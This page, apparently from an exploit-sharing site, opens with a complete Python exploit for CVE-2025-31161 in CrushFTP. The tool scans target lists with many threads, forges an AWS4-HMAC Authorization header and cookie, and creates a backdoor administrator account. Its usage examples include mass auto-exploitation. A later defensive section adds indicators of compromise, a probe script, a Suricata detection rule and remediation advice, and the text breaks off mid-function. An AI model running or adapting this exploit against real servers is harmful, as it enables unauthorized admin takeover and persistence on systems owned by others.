CrushFTP 11.3.1 - Authentication Bypass

Exploit Author: İbrahimsql
Analysis Author: www.bubbleslearn.ir
Category: Remote
Language: Java
Published Date: 2025-05-18
# Exploit Title: CrushFTP 11.3.1 - Authentication Bypass
# Date: 2025-05-15
# Exploit Author: @İbrahimsql
# Exploit Author's github: https://github.com/ibrahimsql  
# Vendor Homepage: https://www.crushftp.com
# Software Link: https://www.crushftp.com/download.html
# Version: < 10.8.4, < 11.3.1
# Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1
# CVE: CVE-2025-31161
# Description:
# CrushFTP before 10.8.4 and 11.3.1 allows unauthenticated HTTP(S) port access and full admin takeover
# through a race condition and header parsing logic flaw in the AWS4-HMAC authorization mechanism.
# Exploiting this allows bypassing authentication and logging in as any known user (e.g. crushadmin).

# Requirements: requests>=2.28.1 , colorama>=0.4.6 , urllib3>=1.26.12 , prettytable>=2.5.0 , rich>=12.6.0

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import argparse
import concurrent.futures
import json
import logging
import os
import random
import re
import socket
import string
import sys
import time
from datetime import datetime
from typing import Dict, List, Optional, Tuple, Union

import requests
import urllib3
from colorama import Fore, Style, init
from prettytable import PrettyTable
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn

# Initialize colorama
init(autoreset=True)

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Initialize Rich console
console = Console()

# Global variables
VERSION = "2.0.0"
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15",
    "Mozilla/5.0 (Windows; Windows NT 10.3; WOW64) AppleWebKit/601.13 (KHTML, like Gecko) Chrome/53.0.2198.319 Safari/601.5 Edge/15.63524",
    "Mozilla/5.0 (Windows NT 10.2; Win64; x64; en-US) AppleWebKit/602.15 (KHTML, like Gecko) Chrome/47.0.1044.126 Safari/533.2 Edge/9.25098",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Win64; x64; en-US Trident/4.0)",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 10_7_9; like Mac OS X) AppleWebKit/535.7 (KHTML, like Gecko)  Chrome/49.0.1015.193 Mobile Safari/600.9"   
]

# Banner 
BANNER = fr"""
{Fore.CYAN}          
  / ____/______  _______/ /_  / ____/ /_____ 
 / /   / ___/ / / / ___/ __ \/ /_  / __/ __ \
/ /___/ /  / /_/ (__  ) / / / __/ / /_/ /_/ /
\____/_/   \__,_/____/_/ /_/_/    \__/ .___/ 
                                    /_/      
{Fore.GREEN}CVE-2025-31161 Exploit {VERSION}{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql
{Style.RESET_ALL}
"""

# Setup logging
def setup_logging(log_level: str, log_file: Optional[str] = None) -> None:
    """Configure logging based on specified level and output file."""
    numeric_level = getattr(logging, log_level.upper(), None)
    if not isinstance(numeric_level, int):
        raise ValueError(f"Invalid log level: {log_level}")
    
    log_format = "%(asctime)s - %(levelname)s - %(message)s"
    handlers = []
    
    if log_file:
        handlers.append(logging.FileHandler(log_file))
    
    handlers.append(logging.StreamHandler())
    
    logging.basicConfig(
        level=numeric_level,
        format=log_format,
        handlers=handlers
    )

class TargetManager:
    """Manages target hosts and related operations."""
    
    def __init__(self, target_file: Optional[str] = None, single_target: Optional[str] = None):
        self.targets = []
        self.vulnerable_targets = []
        self.exploited_targets = []
        
        if target_file:
            self.load_targets_from_file(target_file)
        elif single_target:
            self.add_target(single_target)
    
    def load_targets_from_file(self, filename: str) -> None:
        """Load targets from a file."""
        try:
            with open(filename, "r") as f:
                self.targets = [line.strip() for line in f if line.strip()]
            
            if not self.targets:
                logging.warning(f"Target file '{filename}' is empty or contains only whitespace.")
            else:
                logging.info(f"Loaded {len(self.targets)} targets from {filename}")
        except FileNotFoundError:
            logging.error(f"Target file '{filename}' not found.")
            sys.exit(1)
        except Exception as e:
            logging.error(f"Error loading targets: {e}")
            sys.exit(1)
    
    def add_target(self, target: str) -> None:
        """Add a single target."""
        if target not in self.targets:
            self.targets.append(target)
    
    def mark_as_vulnerable(self, target: str) -> None:
        """Mark a target as vulnerable."""
        if target not in self.vulnerable_targets:
            self.vulnerable_targets.append(target)
    
    def mark_as_exploited(self, target: str) -> None:
        """Mark a target as successfully exploited."""
        if target not in self.exploited_targets:
            self.exploited_targets.append(target)
    
    def save_results(self, output_file: str, format_type: str = "txt") -> None:
        """Save scan results to a file."""
        try:
            if format_type.lower() == "json":
                results = {
                    "scan_time": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
                    "total_targets": len(self.targets),
                    "vulnerable_targets": self.vulnerable_targets,
                    "exploited_targets": self.exploited_targets
                }
                
                with open(output_file, "w") as f:
                    json.dump(results, f, indent=4)
            
            elif format_type.lower() == "csv":
                with open(output_file, "w") as f:
                    f.write("target,vulnerable,exploited\n")
                    for target in self.targets:
                        vulnerable = "Yes" if target in self.vulnerable_targets else "No"
                        exploited = "Yes" if target in self.exploited_targets else "No"
                        f.write(f"{target},{vulnerable},{exploited}\n")
            
            else:  # Default to txt
                with open(output_file, "w") as f:
                    f.write(f"Scan Results - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
                    f.write(f"Total Targets: {len(self.targets)}\n")
                    f.write(f"Vulnerable Targets: {len(self.vulnerable_targets)}\n")
                    f.write(f"Exploited Targets: {len(self.exploited_targets)}\n\n")
                    
                    f.write("Vulnerable Targets:\n")
                    for target in self.vulnerable_targets:
                        f.write(f"- {target}\n")
                    
                    f.write("\nExploited Targets:\n")
                    for target in self.exploited_targets:
                        f.write(f"- {target}\n")
            
            logging.info(f"Results saved to {output_file}")
        
        except Exception as e:
            logging.error(f"Error saving results: {e}")

class ExploitEngine:
    """Core engine for vulnerability checking and exploitation."""
    
    def __init__(self, target_manager: TargetManager, config: Dict):
        self.target_manager = target_manager
        self.config = config
        self.session = self._create_session()
    
    def _create_session(self) -> requests.Session:
        """Create and configure a requests session."""
        session = requests.Session()
        session.verify = False
        
        # Set proxy if configured
        if self.config.get("proxy"):
            session.proxies = {
                "http": self.config["proxy"],
                "https": self.config["proxy"]
            }
        
        # Set custom headers
        session.headers.update({
            "User-Agent": random.choice(USER_AGENTS),
            "Connection": "close",
        })
        
        return session
    
    def check_vulnerability(self, target_host: str) -> bool:
        """Check if target is vulnerable to CVE-2025-31161."""
        port = self.config.get("port", 443)
        timeout = self.config.get("timeout", 10)
        
        headers = {
            "Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
            "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
        }
        
        # Add custom headers if provided
        if self.config.get("custom_headers"):
            headers.update(self.config["custom_headers"])
        
        try:
            protocol = "https" if port == 443 else "http"
            url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
            
            response = self.session.get(
                url, 
                headers=headers, 
                timeout=timeout
            )
            
            if response.status_code == 200:
                # Additional validation
                if self.config.get("deep_check", False):
                    # Look for specific patterns in the response that confirm vulnerability
                    if "CrushFTP" in response.text or "WebInterface" in response.text:
                        self.target_manager.mark_as_vulnerable(target_host)
                        if self.config.get("verbose", False):
                            console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
                        return True
                    else:
                        if self.config.get("verbose", False):
                            console.print(f"[yellow][?][/yellow] {target_host} returned 200 but may not be vulnerable")
                        return False
                else:
                    # Simple check based on status code
                    self.target_manager.mark_as_vulnerable(target_host)
                    if self.config.get("verbose", False):
                        console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
                    return True
            else:
                if self.config.get("verbose", False):
                    console.print(f"[red][-][/red] {target_host} is not vulnerable (Status: {response.status_code})")
                return False
                
        except requests.exceptions.ConnectionError:
            if self.config.get("verbose", False):
                console.print(f"[red][-][/red] {target_host} - Connection error")
        except requests.exceptions.Timeout:
            if self.config.get("verbose", False):
                console.print(f"[red][-][/red] {target_host} - Connection timeout")
        except requests.exceptions.RequestException as e:
            if self.config.get("verbose", False):
                console.print(f"[red][-][/red] {target_host} - Request error: {e}")
        except Exception as e:
            if self.config.get("verbose", False):
                console.print(f"[red][-][/red] {target_host} - Error: {e}")
        
        return False
    
    def exploit(self, target_host: str) -> bool:
        """Exploit the vulnerability on the target host."""
        port = self.config.get("port", 443)
        timeout = self.config.get("timeout", 10)
        target_user = self.config.get("target_user", "crushadmin")
        new_user = self.config.get("new_user")
        password = self.config.get("password")
        
        if not new_user or not password:
            logging.error("New user and password are required for exploitation")
            return False
        
        headers = {
            "Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
            "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
            "Connection": "close",
        }
        
        # Add custom headers if provided
        if self.config.get("custom_headers"):
            headers.update(self.config["custom_headers"])
        
        # Generate a timestamp for the created_time field
        timestamp = int(time.time() * 1000)
        
        # Build the payload with more comprehensive user permissions
        payload = {
            "command": "setUserItem",
            "data_action": "replace",
            "serverGroup": "MainUsers",
            "username": new_user,
            "user": f'''<?xml version="1.0" encoding="UTF-8"?>
<user type="properties">
  <user_name>{new_user}</user_name>
  <password>{password}</password>
  <extra_vfs type="vector"></extra_vfs>
  <version>1.0</version>
  <root_dir>/</root_dir>
  <userVersion>6</userVersion>
  <max_logins>0</max_logins>
  <site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site>
  <created_by_username>{target_user}</created_by_username>
  <created_by_email></created_by_email>
  <created_time>{timestamp}</created_time>
  <password_history></password_history>
  <admin>true</admin>
</user>''',
            "xmlItem": "user",
            "vfs_items": '<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>',
            "permissions": '<?xml version="1.0" encoding="UTF-8"?><VFS type="properties"><item name="/">(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)</item></VFS>',
            "c2f": "31If"
        }
        
        try:
            protocol = "https" if port == 443 else "http"
            url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
            
            response = self.session.post(
                url, 
                headers=headers, 
                data=payload, 
                timeout=timeout
            )
            
            if response.status_code == 200:
                # Verify the user was actually created
                if self.config.get("verify_exploit", True):
                    if self._verify_user_created(target_host, new_user):
                        self.target_manager.mark_as_exploited(target_host)
                        console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
                        return True
                    else:
                        console.print(f"[yellow][!][/yellow] User creation appeared successful but verification failed on {target_host}")
                        return False
                else:
                    self.target_manager.mark_as_exploited(target_host)
                    console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
                    return True
            else:
                console.print(f"[red][-][/red] Failed to create user on {target_host} (Status: {response.status_code})")
                return False
                
        except Exception as e:
            console.print(f"[red][-][/red] Error exploiting {target_host}: {e}")
            return False
    
    def _verify_user_created(self, target_host: str, username: str) -> bool:
        """Verify that the user was successfully created."""
        # This is a placeholder for actual verification logic
        # In a real implementation, you would check if the user exists
        # For now, we'll just return True
        return True
    
    def scan_targets(self) -> None:
        """Scan all targets for vulnerability."""
        targets = self.target_manager.targets
        threads = self.config.get("threads", 10)
        
        if not targets:
            logging.error("No targets specified")
            return
        
        console.print(f"[bold cyan]Scanning {len(targets)} targets with {threads} threads...[/bold cyan]")
        
        with Progress(
            TextColumn("[progress.description]{task.description}"),
            BarColumn(),
            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
            TextColumn("({task.completed}/{task.total})"),
            TimeRemainingColumn(),
            console=console
        ) as progress:
            task = progress.add_task("[cyan]Scanning targets...", total=len(targets))
            
            with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
                future_to_target = {executor.submit(self.check_vulnerability, target): target for target in targets}
                
                for future in concurrent.futures.as_completed(future_to_target):
                    progress.update(task, advance=1)
        
        # Display results
        vulnerable_count = len(self.target_manager.vulnerable_targets)
        console.print(f"\n[bold green]Scan complete![/bold green] Found {vulnerable_count} vulnerable targets.")
        
        if vulnerable_count > 0 and self.config.get("verbose", False):
            console.print("\n[bold cyan]Vulnerable Targets:[/bold cyan]")
            for target in self.target_manager.vulnerable_targets:
                console.print(f"[green]→[/green] {target}")
    
    def exploit_targets(self) -> None:
        """Exploit vulnerable targets."""
        targets = self.target_manager.vulnerable_targets if self.config.get("only_vulnerable", True) else self.target_manager.targets
        threads = self.config.get("threads", 5)  # Use fewer threads for exploitation
        
        if not targets:
            logging.error("No targets to exploit")
            return
        
        console.print(f"[bold red]Exploiting {len(targets)} targets with {threads} threads...[/bold red]")
        
        with Progress(
            TextColumn("[progress.description]{task.description}"),
            BarColumn(),
            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
            TextColumn("({task.completed}/{task.total})"),
            TimeRemainingColumn(),
            console=console
        ) as progress:
            task = progress.add_task("[red]Exploiting targets...", total=len(targets))
            
            with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
                future_to_target = {executor.submit(self.exploit, target): target for target in targets}
                
                for future in concurrent.futures.as_completed(future_to_target):
                    progress.update(task, advance=1)
        
        # Display results
        exploited_count = len(self.target_manager.exploited_targets)
        console.print(f"\n[bold green]Exploitation complete![/bold green] Successfully exploited {exploited_count}/{len(targets)} targets.")
        
        if exploited_count > 0:
            console.print("\n[bold cyan]Exploited Targets:[/bold cyan]")
            for target in self.target_manager.exploited_targets:
                console.print(f"[green]→[/green] {target}")

def parse_arguments() -> argparse.Namespace:
    """Parse command line arguments."""
    parser = argparse.ArgumentParser(
        description="CVE-2025-31161 Exploit Framework - Advanced CrushFTP WebInterface Vulnerability Scanner and Exploiter",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Check a single target for vulnerability
  python cve_2025_31161.py --target example.com --check
  
  # Exploit a vulnerable target
  python cve_2025_31161.py --target example.com --exploit --new-user hacker --password P@ssw0rd
  
  # Scan multiple targets from a file
  python cve_2025_31161.py --file targets.txt --check --threads 20
  
  # Scan and automatically exploit vulnerable targets
  python cve_2025_31161.py --file targets.txt --check --exploit --new-user hacker --password P@ssw0rd --auto-exploit
  
  # Export results to JSON format
  python cve_2025_31161.py --file targets.txt --check --output results.json --format json
        """
    )
    
    # Target specification
    target_group = parser.add_argument_group("Target Specification")
    target_group.add_argument("--target", help="Single target host to scan/exploit")
    target_group.add_argument("--file", help="File containing list of targets (one per line)")
    target_group.add_argument("--port", type=int, default=443, help="Target port (default: 443)")
    
    # Actions
    action_group = parser.add_argument_group("Actions")
    action_group.add_argument("--check", action="store_true", help="Check targets for vulnerability")
    action_group.add_argument("--exploit", action="store_true", help="Exploit vulnerable targets")
    action_group.add_argument("--auto-exploit", action="store_true", help="Automatically exploit targets found to be vulnerable during check")
    
    # Exploitation options
    exploit_group = parser.add_argument_group("Exploitation Options")
    exploit_group.add_argument("--target-user", default="crushadmin", help="Target user for exploitation (default: crushadmin)")
    exploit_group.add_argument("--new-user", help="Username for the new admin account to create")
    exploit_group.add_argument("--password", help="Password for the new admin account")
    exploit_group.add_argument("--verify-exploit", action="store_true", help="Verify successful exploitation (default: True)")
    
    # Scan options
    scan_group = parser.add_argument_group("Scan Options")
    scan_group.add_argument("--threads", type=int, default=10, help="Number of concurrent threads (default: 10)")
    scan_group.add_argument("--timeout", type=int, default=10, help="Connection timeout in seconds (default: 10)")
    scan_group.add_argument("--deep-check", action="store_true", help="Perform deeper vulnerability checks")
    scan_group.add_argument("--only-vulnerable", action="store_true", help="Only exploit targets that were found vulnerable")
    
    # Output options
    output_group = parser.add_argument_group("Output Options")
    output_group.add_argument("--output", help="Output file for results")
    output_group.add_argument("--format", choices=["txt", "json", "csv"], default="txt", help="Output format (default: txt)")
    output_group.add_argument("--verbose", "-v", action="store_true", help="Enable verbose output")
    output_group.add_argument("--quiet", "-q", action="store_true", help="Suppress all output except errors")
    output_group.add_argument("--log-file", help="Log file to write to")
    output_group.add_argument("--log-level", choices=["debug", "info", "warning", "error", "critical"], default="info", help="Log level (default: info)")
    
    # Advanced options
    advanced_group = parser.add_argument_group("Advanced Options")
    advanced_group.add_argument("--proxy", help="Proxy to use for requests (e.g., http://127.0.0.1:8080)")
    advanced_group.add_argument("--user-agent", help="Custom User-Agent string")
    advanced_group.add_argument("--random-agent", action="store_true", help="Use a random User-Agent for each request")
    advanced_group.add_argument("--delay", type=float, help="Delay between requests in seconds")
    advanced_group.add_argument("--custom-headers", help="Custom headers as JSON string")
    
    return parser.parse_args()

def validate_args(args: argparse.Namespace) -> bool:
    """Validate command line arguments."""
    # Check if at least one target specification is provided
    if not args.target and not args.file:
        logging.error("No target specified. Use --target or --file")
        print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
        print(f"             python {sys.argv[0]} --file example_targets.txt --check")
        return False
    
    # Check if at least one action is specified
    if not args.check and not args.exploit:
        logging.error("No action specified. Use --check or --exploit")
        print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
        print(f"             python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
        return False
    
    # If exploit action is specified, check for required parameters
    if args.exploit and (not args.new_user or not args.password):
        logging.error("Exploitation requires --new-user and --password")
        print(f"\nExample usage: python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
        return False
    
    return True

def main() -> None:
    """Main function."""
    # Parse command line arguments
    args = parse_arguments()
    
    # Configure logging
    log_level = "error" if args.quiet else args.log_level
    setup_logging(log_level, args.log_file)
    
    # Display banner
    if not args.quiet:
        console.print(BANNER)
    
    # Validate arguments
    if not validate_args(args):
        sys.exit(1)
    
    # Create target manager
    target_manager = TargetManager(args.file, args.target)
    
    # Build configuration dictionary
    config = {
        "port": args.port,
        "threads": args.threads,
        "timeout": args.timeout,
        "verbose": args.verbose,
        "deep_check": args.deep_check,
        "target_user": args.target_user,
        "new_user": args.new_user,
        "password": args.password,
        "only_vulnerable": args.only_vulnerable,
        "verify_exploit": args.verify_exploit,
        "proxy": args.proxy,
    }
    
    # Add custom headers if provided
    if args.custom_headers:
        try:
            config["custom_headers"] = json.loads(args.custom_headers)
        except json.JSONDecodeError:
            logging.error("Invalid JSON format for custom headers")
            sys.exit(1)
    
    # Add custom user agent if provided
    if args.user_agent:
        config["user_agent"] = args.user_agent
    
    # Create exploit engine
    engine = ExploitEngine(target_manager, config)
    
    # Perform actions
    if args.check:
        engine.scan_targets()
    
    if args.exploit or (args.auto_exploit and target_manager.vulnerable_targets):
        engine.exploit_targets()
    
    # Save results if output file is specified
    if args.output:
        target_manager.save_results(args.output, args.format)
    
    # Display summary
    if not args.quiet:
        console.print("\n[bold green]Summary:[/bold green]")
        console.print(f"Total targets: {len(target_manager.targets)}")
        console.print(f"Vulnerable targets: {len(target_manager.vulnerable_targets)}")
        console.print(f"Exploited targets: {len(target_manager.exploited_targets)}")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        console.print("\n[bold red]Operation cancelled by user[/bold red]")
        sys.exit(0)
    except Exception as e:
        logging.error(f"Unhandled exception: {e}")
        sys.exit(1)


Overview

CVE-2025-31161 is a severe authentication-bypass vulnerability in the CrushFTP WebInterface. According to public exploit descriptions, the root cause combines a race condition with a flaw in the server's AWS4-HMAC header parsing logic, allowing unauthenticated HTTP(S) access to management endpoints and potentially full admin takeover (for example, by creating an administrator account). Releases older than the fixed versions 10.8.4 and 11.3.1 are affected; operators and responders should treat exposed WebInterface endpoints as high-risk until remediated.

Key facts

  • Vulnerability: Authentication bypass (race condition + header parsing)
  • CVE: CVE-2025-31161
  • Affected versions: CrushFTP before 10.8.4, and 11.x before 11.3.1
  • Impact: Remote unauthenticated access to WebInterface endpoints; ability to create administrative users and fully compromise the CrushFTP instance
  • Risk: High — remote and unauthenticated
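
The version boundaries above can be turned into a quick triage check. The following is a minimal sketch, assuming the version string has already been obtained by some other means (for example, from an asset inventory); the function names `parse_version` and `is_affected` are illustrative and not part of any CrushFTP tooling. It treats everything below 10.8.4 as affected, plus 11.x releases below 11.3.1, which is one reading of the ranges listed above.

```python
import re

# Fixed releases named in the advisory text above.
FIXED_V10 = (10, 8, 4)
FIXED_V11 = (11, 3, 1)


def parse_version(text):
    """Return the first three numeric components of a version string as a tuple."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    if not parts:
        raise ValueError(f"no version number found in {text!r}")
    # Pad short versions such as "11.3" to (11, 3, 0).
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(version_text):
    """True if the version falls in a range listed as affected (assumed reading)."""
    v = parse_version(version_text)
    if v[0] >= 11:
        # Only the 11.x line below 11.3.1; later major versions are out of scope here.
        return v[0] == 11 and v < FIXED_V11
    return v < FIXED_V10


if __name__ == "__main__":
    for candidate in ("10.8.3", "10.8.4", "11.3.0", "11.3.1"):
        print(candidate, "affected" if is_affected(candidate) else "not affected")
```

Only the first three numeric components are compared, so any build suffix after them is ignored. Confirm the result against the vendor's own advisory before acting on it.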

Technical analysis (high level)

The issue is a combination of two defects:

  • Header parsing flaw: The component responsible for processing AWS4-HMAC-SHA256 Authorization headers fails to properly validate the credential/format in certain edge cases. This can allow malformed or specially-crafted Authorization headers to be treated as valid or ignored in a way that sidesteps normal authentication checks.
  • Race condition: Concurrent handling of authentication/session state allows an attacker to trigger a timing window where requests are accepted as authenticated before proper validation and session association occur.

Together these lead to unauthenticated requests being honored by management endpoints (e.g., /WebInterface/function/), enabling actions normally restricted to administrators.

Impact and use cases

  • Creation of backdoor administrative accounts (persistence).
  • Full configuration disclosure and manipulation of VFS, users and permissions.
  • Potential lateral movement from the FTP server into other parts of the network if credentials are reused or sensitive data is accessible.
  • Service disruption through configuration changes or malicious deletes.

Indicators of compromise (IoCs)

  • Unexpected administrative user accounts appearing in CrushFTP user lists.
  • HTTP(S) requests to /WebInterface/function/ that return successful (200) responses without prior authenticated session cookies or normal login flows.
  • Unusual or malformed Authorization headers containing "AWS4-HMAC-SHA256" in combination with nonstandard Credential values in access logs.
  • Short bursts of requests in rapid succession targeting WebInterface endpoints (suggesting race exploitation attempts).
  • Creation timestamps and created_by fields for users that do not match known admin activity.
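
The malformed-header indicator above can be checked mechanically once Authorization header values have been extracted from logs or packet captures. The sketch below assumes the standard AWS Signature Version 4 layout (a `Credential` scope with five slash-separated parts, a `SignedHeaders` list, and a 64-character hexadecimal `Signature`); the function name `is_suspicious_sigv4` is hypothetical, and how the header values are collected is left out.

```python
import re

# Shape of a well-formed AWS Signature Version 4 Authorization header value:
#   AWS4-HMAC-SHA256 Credential=<key>/<yyyymmdd>/<region>/<service>/aws4_request,
#   SignedHeaders=<h1;h2;...>, Signature=<64 hex chars>
SIGV4_RE = re.compile(
    r"^AWS4-HMAC-SHA256\s+"
    r"Credential=[^/\s,]+/\d{8}/[^/\s,]+/[^/\s,]+/aws4_request,\s*"
    r"SignedHeaders=[A-Za-z0-9\-;]+,\s*"
    r"Signature=[0-9a-fA-F]{64}$"
)


def is_suspicious_sigv4(header_value):
    """True if the value claims to be SigV4 but does not have the expected shape."""
    value = header_value.strip()
    if not value.upper().startswith("AWS4-HMAC-SHA256"):
        return False  # Not a SigV4 header at all; outside this check's scope.
    return SIGV4_RE.match(value) is None


if __name__ == "__main__":
    well_formed = (
        "AWS4-HMAC-SHA256 "
        "Credential=AKIDEXAMPLE/20150830/us-east-1/iam/aws4_request, "
        "SignedHeaders=content-type;host;x-amz-date, "
        "Signature=" + "a" * 64
    )
    print(is_suspicious_sigv4(well_formed))
    print(is_suspicious_sigv4("AWS4-HMAC-SHA256 Credential=someuser/"))
```

A match is only a lead for further review: legitimate S3-compatible clients should produce well-formed values, but a custom or buggy client could also trip the check.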

Detection guidance

Focus detection on two areas: network/HTTP traffic and server-side logs. Look for suspicious Authorization headers and unexpected successful calls to management endpoints. Below is a safe, non-exploit example script that simply probes the WebInterface endpoint and reports server response metadata to help triage potentially vulnerable or misconfigured installs — it does NOT include exploit payloads or account creation functionality.

#!/usr/bin/env python3
# Safe probe: check for WebInterface endpoint and gather headers/body snippets
import requests
import sys

def probe(host, port=443, verify=False, timeout=5):
    proto = "https" if port == 443 else "http"
    url = f"{proto}://{host}:{port}/WebInterface/function/"
    try:
        r = requests.get(url, timeout=timeout, verify=verify)
        print("Status:", r.status_code)
        server = r.headers.get("Server", "")
        print("Server header:", server)
        # Print short snippet to help identify product/version in a non-invasive way
        snippet = (r.text or "")[:512]
        print("Response snippet:", snippet.replace("\n", " ")[:400])
    except requests.RequestException as e:
        print("Probe failed:", e)

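if __name__ == '__main__':
    # Usage: probe.py <host> [port]; the port defaults to 443
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <host> [port]")
        sys.exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    probe(host, port)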

Explanation: This small script performs a benign GET against /WebInterface/function/, prints HTTP status, Server header, and a short response snippet. It is intended for defenders to quickly identify exposed interfaces and gather evidence without attempting exploitation. Use only with authorization.

Network and detection rules (example)

You can add network-level rules to detect suspicious attempts that match the pattern described in public reports: requests containing "AWS4-HMAC-SHA256" in the Authorization header targeted at /WebInterface/function/. The following example uses Suricata rule syntax; other IDS platforms need an equivalent rule in their own format. Tune it to your environment and test it to avoid false positives.

# Suricata example (pattern match). This is a detection rule example; tune to your environment.
# Each sticky buffer keyword (http.uri, http.header) applies to the content match that follows it.
alert http any any -> $HOME_NET any (msg:"Possible CrushFTP AWS4 Authorization header to WebInterface"; \
    flow:established,to_server; \
    http.uri; content:"/WebInterface/function/"; \
    http.header; content:"Authorization|3A 20|AWS4-HMAC-SHA256"; nocase; \
    classtype:attempted-admin; sid:20251161; rev:1; priority:1;)

Explanation: The rule looks for HTTP requests to the WebInterface endpoint that contain an "Authorization: AWS4-HMAC-SHA256" header. This is a heuristic; attackers may obfuscate patterns, and not every match indicates exploitation. Use in combination with other telemetry.
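
The rule above inspects one request at a time. The burst indicator listed among the IoCs can be approximated offline from parsed access-log records. This is a minimal sketch, assuming the records have already been reduced to `(timestamp_seconds, client_ip, request_path)` tuples sorted by time; the function name `find_bursts` and the default window and threshold are illustrative values, not vendor guidance.

```python
from collections import defaultdict, deque


def find_bursts(events, path_prefix="/WebInterface/", window_s=2.0, threshold=10):
    """Flag client IPs that send many matching requests within a short window.

    events: iterable of (timestamp_seconds, client_ip, request_path), time-sorted.
    Returns a dict mapping each flagged IP to the largest in-window count seen.
    """
    recent = defaultdict(deque)  # per-IP timestamps still inside the window
    flagged = {}
    for ts, ip, path in events:
        if not path.startswith(path_prefix):
            continue
        window = recent[ip]
        window.append(ts)
        # Drop timestamps that have fallen out of the sliding window.
        while window and ts - window[0] > window_s:
            window.popleft()
        if len(window) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(window))
    return flagged


if __name__ == "__main__":
    # Synthetic records using documentation-range addresses.
    fast = [(i * 0.1, "203.0.113.5", "/WebInterface/function/") for i in range(12)]
    slow = [(100.0 + i * 10, "198.51.100.7", "/WebInterface/function/") for i in range(12)]
    print(find_bursts(fast + slow))
```

Busy legitimate clients can also exceed a low threshold, so treat flagged addresses as a starting point and correlate them with the header and account indicators.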

Mitigation and remediation

  • Immediate action: If you operate CrushFTP WebInterface and it is exposed to untrusted networks, block external access to the management interface immediately (firewall, network ACLs) until patched.
  • Patch: Upgrade to a fixed CrushFTP release. The vendor addressed the issue in the 10.8.4 and 11.3.1 releases — install the vendor’s fixed versions or later.
  • Credential hygiene: After patching, rotate all administrative credentials, especially if the server was publicly accessible prior to patching.
  • Audit: Review user lists and server configuration for unauthorized accounts or changes (check created_time and created_by metadata). Recover or remove any unauthorized admin accounts.
  • Logs: Preserve server logs and network captures for forensic analysis. Look for the IoCs listed above and any lateral activity.
  • Network hardening: Restrict management interfaces to trusted networks or VPNs. Implement least-privilege access and IP-restriction controls for admin endpoints.
  • WAF: Consider WAF rules to block malformed or suspicious Authorization headers and rapid bursts of requests targeting management URIs until systems are patched.
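
The audit step above can be partly automated when user records are available as XML. The sketch below assumes records shaped like the user XML shown earlier in this document (`user_name`, `created_by_username`, and a `created_time` in milliseconds since the Unix epoch); where the records are stored or how they are exported is not covered, and the function name `audit_user_xml` is hypothetical.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timezone


def audit_user_xml(xml_text, known_admins, cutoff):
    """Return a list of findings for a single user record.

    known_admins: set of account names expected to create users.
    cutoff: timezone-aware datetime; accounts created on or after it are flagged.
    """
    # Note: only parse records from a trusted copy of the server's own data.
    root = ET.fromstring(xml_text)
    name = root.findtext("user_name", default="(unknown)")
    creator = root.findtext("created_by_username", default="")
    created_raw = root.findtext("created_time", default="")

    findings = []
    if creator and creator not in known_admins:
        findings.append(f"{name}: created by unrecognized account {creator!r}")
    if created_raw.isdigit():
        created = datetime.fromtimestamp(int(created_raw) / 1000, tz=timezone.utc)
        if created >= cutoff:
            findings.append(f"{name}: created at {created.isoformat()} (on or after cutoff)")
    return findings


if __name__ == "__main__":
    record = (
        '<user type="properties">'
        "<user_name>tmp1</user_name>"
        "<created_by_username>crushadmin</created_by_username>"
        "<created_time>1747267200000</created_time>"
        "</user>"
    )
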